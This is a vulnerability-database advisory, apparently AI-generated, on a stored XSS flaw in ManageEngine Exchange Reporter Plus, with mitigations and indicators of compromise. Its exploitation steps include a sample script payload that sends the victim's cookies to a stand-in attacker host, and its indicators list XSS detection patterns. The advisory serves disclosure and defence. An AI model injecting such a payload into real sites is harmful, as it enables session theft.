CVE-2026-4108
Zoho ManageEngine Exchange Reporter Plus vulnerability analysis and mitigation

Overview

CVE-2026-4108 is a Stored Cross-Site Scripting (XSS) vulnerability in Zohocorp ManageEngine Exchange Reporter Plus affecting all builds before version 5802 (including builds 5800 and 5801). The flaw resides in the Non-Owner Mailbox Permission report within the Reports module, where user-supplied input is not properly neutralized before being rendered in web pages. It was disclosed on April 3, 2026, and fixed on March 19, 2026 in build 5802. The CVSS v3.1 base score is reported as 4.8 (Medium) by NVD and 7.3 (High) by GitHub Advisory Database, with the vendor classifying severity as High (ManageEngine Advisory, Github Advisory).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting) and stems from insufficient input validation in the Non-Owner Mailbox Permission report feature of Exchange Reporter Plus (ManageEngine Advisory). An authenticated attacker with Exchange administrative privileges can inject malicious JavaScript payloads into report fields; these scripts are persistently stored in the application and execute in the browsers of other users who subsequently view the affected report. Exploitation requires network access, low attack complexity, high privileges, and user interaction (a victim must view the poisoned report page) (Github Advisory).

Impact

Successful exploitation allows an authenticated attacker to execute arbitrary scripts in the context of other users' browser sessions when they view the Non-Owner Mailbox Permission report. This can lead to theft of session tokens, exposure of sensitive Exchange reporting data, and unauthorized actions performed on behalf of the victim within Exchange Reporter Plus. Availability is not impacted, but both confidentiality and integrity are at risk — attackers may exfiltrate report data or manipulate report content (ManageEngine Advisory, Github Advisory).

Exploitability

There is no public proof-of-concept exploit and no evidence of in-the-wild exploitation at this time (Github Advisory). The EPSS score is approximately 0.023% (7th percentile), indicating a low near-term exploitation probability. The vulnerability was responsibly disclosed by researcher C311 through the Zoho BugBounty program and is not listed in the CISA Known Exploited Vulnerabilities catalog (ManageEngine Advisory).

Exploitation steps

  1. Reconnaissance: Identify ManageEngine Exchange Reporter Plus instances running builds 5801 or earlier, accessible via the network.
  2. Authentication: Log in to the application using an account with Exchange administrative privileges within the Exchange organization.
  3. Inject malicious payload: Navigate to the Non-Owner Mailbox Permission report section and insert a crafted XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into an input field that is stored and later rendered in the report.
  4. Wait for victim interaction: When another user (e.g., an administrator) views the affected Non-Owner Mailbox Permission report, the stored script executes in their browser session.
  5. Harvest results: The attacker receives the victim's session token or other sensitive data, enabling session hijacking or further unauthorized actions within Exchange Reporter Plus (ManageEngine Advisory, Github Advisory).

Indicators of compromise

  • Logs: Application or web server logs showing unusual or encoded input (e.g., <script>, javascript:, onerror=, URL-encoded equivalents) submitted to Non-Owner Mailbox Permission report endpoints.
  • Network: Unexpected outbound HTTP/S requests from user browsers to external or unknown domains shortly after accessing Exchange Reporter Plus report pages, potentially carrying cookie or session data in query parameters.
  • Application Behavior: Reports displaying unexpected content, blank sections, or triggering browser security warnings when viewed by users.
  • Authentication Logs: Suspicious session activity or logins from unfamiliar IP addresses following access to the affected report, which may indicate session token theft.

Mitigation and workarounds

Zohocorp resolved this vulnerability in ManageEngine Exchange Reporter Plus build 5802, released March 19, 2026, by implementing proper input validation in the affected report module. All users should upgrade to build 5802 or later immediately using the available service pack (ManageEngine Advisory). As interim mitigations prior to patching: restrict access to the Non-Owner Mailbox Permission report to only trusted administrators, implement Content Security Policy (CSP) headers on the application, and monitor authentication logs for anomalous session activity.

Community reactions

The vulnerability was reported by security researcher C311 via the Zoho BugBounty program and received standard coverage across vulnerability aggregation platforms including VulDB, CIRCL, and ENISA EUVD shortly after disclosure (ManageEngine Advisory). A brief mention appeared on Bluesky social media (cyberhub.blog) on April 3, 2026. No significant independent researcher commentary or major media coverage has been identified beyond routine vulnerability database entries.

Additional resources


SourceThis report was generated using AI

Related Zoho ManageEngine Exchange Reporter Plus vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-4107MEDIUM5.4
  • Zoho ManageEngine Exchange Reporter Plus logoZoho ManageEngine Exchange Reporter Plus
  • cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus
NoYesApr 03, 2026
CVE-2026-27655MEDIUM4.8
  • Zoho ManageEngine Exchange Reporter Plus logoZoho ManageEngine Exchange Reporter Plus
  • cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus
NoYesApr 03, 2026
CVE-2026-4108MEDIUM4.8
  • Zoho ManageEngine Exchange Reporter Plus logoZoho ManageEngine Exchange Reporter Plus
  • cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus
NoYesApr 03, 2026
CVE-2026-3880MEDIUM4.8
  • Zoho ManageEngine Exchange Reporter Plus logoZoho ManageEngine Exchange Reporter Plus
  • cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus
NoYesApr 03, 2026
CVE-2026-3879MEDIUM4.8
  • Zoho ManageEngine Exchange Reporter Plus logoZoho ManageEngine Exchange Reporter Plus
  • cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus
NoYesApr 03, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management